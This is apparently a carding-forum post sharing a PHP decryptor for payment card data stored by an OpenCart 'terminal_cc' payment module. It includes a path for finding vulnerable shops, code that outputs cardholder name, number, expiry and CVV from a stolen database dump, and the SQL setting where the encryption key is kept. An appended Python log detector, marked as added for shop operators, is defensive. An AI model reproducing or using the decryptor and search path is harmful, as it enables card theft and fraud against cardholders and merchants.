Man
Good morning! I came across an interesting form of payment, terminal_cc. The trick of this form is that the card data is stored directly in the store's database. Of course, I couldn't just pass by and wrote a decryptor, which I am happy to share with the forum. So, in order:
How to search:
Code:
/catalog/controller/extension/payment/terminal_cc.php
- in response, a blank page.
Examples of encrypted cards:
Decryptor code:
Code:
<?php
/** (`id`, `order_id`, `cc_name`, `cc_expirationdate`, `e_cc_cardnumber`, `e_cc_cardnumber_iv`, `e_cc_cardnumber_tag`, `e_cc_securitycode`, `e_cc_securitycode_iv`, `e_cc_securitycode_tag`, `e_cc_passport`, `e_cc_passport_iv`, `e_cc_passport_tag`, `removed`) **/
function decrpt($c,$i,$t){
$cipher = "aes-128-gcm";
$secret_key = '';
$key = hash('sha256', $secret_key);
$text = openssl_decrypt(base64_decode($c), $cipher, $key, 0, base64_decode($i), base64_decode($t));
return $text;
}
$f_cc = file('CARDS.sql');
foreach($f_cc as $st){
$data = explode(',', $st);
if(isset($data[3])){
$holder = $data[2];
$date = $data[3];
$num = decrpt($data[4],$data[5],$data[6]);
$cvv = decrpt($data[7],$data[8],$data[9]);
print $holder.':'.$num.':'.$date.':'.$cvv. PHP_EOL;
//die();
}
}
The key is stored in the database:
Code:
INSERT INTO `oc_setting` (`setting_id`, `store_id`, `code`, `key`, `value`, `serialized`) VALUES ('33598', '0', 'payment_terminal_cc', 'payment_terminal_cc_encryption', '64e074e3b11c9e9fbb8afd10f3be49ca', '0');
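For shop operators, an added detection example (not part of the original post) that flags direct requests for controller source files in a web access log, including the path quoted above. It assumes Combined Log Format and that legitimate storefront traffic is routed through `index.php?route=...`; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path quoted in the post; a direct request for it is rated "high".
KNOWN_PATH = "/catalog/controller/extension/payment/terminal_cc.php"
# Assumption: shop traffic is routed through index.php?route=..., so any direct
# request for a controller source file is unexpected.
CONTROLLER_RE = re.compile(r"^/catalog/controller/.+\.php$", re.IGNORECASE)
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:08:14:02 +0000] "GET /catalog/controller/extension/payment/terminal_cc.php HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.7 - - [12/Mar/2024:08:14:05 +0000] "GET //catalog/controller/extension/payment/terminal%5Fcc.php HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.23 - - [12/Mar/2024:08:15:11 +0000] "GET /index.php?route=checkout/cart HTTP/1.1" 200 18234 "-" "-"',
    '198.51.100.40 - - [12/Mar/2024:08:16:40 +0000] "GET /catalog/controller/common/home.php HTTP/1.1" 403 153 "-" "-"',
]

def classify(line):
    """Return (ip, severity, path, status) for a direct controller request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Drop the query string, decode %xx escapes and collapse repeated slashes
    # so differently spelled forms of the same path still match.
    path = re.sub(r"/{2,}", "/", unquote(m["target"].split("?", 1)[0]))
    if not CONTROLLER_RE.match(path):
        return None
    severity = "high" if path.lower() == KNOWN_PATH else "medium"
    return m["ip"], severity, path, int(m["status"])

def summarise(lines):
    """Group findings per client IP, keeping the highest severity seen."""
    report = defaultdict(lambda: {"severity": "medium", "paths": set(), "answered": 0})
    for ip, severity, path, status in filter(None, map(classify, lines)):
        entry = report[ip]
        entry["paths"].add(path)
        if severity == "high":
            entry["severity"] = "high"
        if status == 200:  # heuristic: the file exists and the server executed it
            entry["answered"] += 1
    return dict(report)

if __name__ == "__main__":
    for ip, entry in summarise(SAMPLE_LOG).items():
        print(ip, entry["severity"], entry["answered"], sorted(entry["paths"]))
```

A non-zero `answered` count means the server is serving controller files directly; denying web access to `/catalog/controller/` at the web server closes that probe.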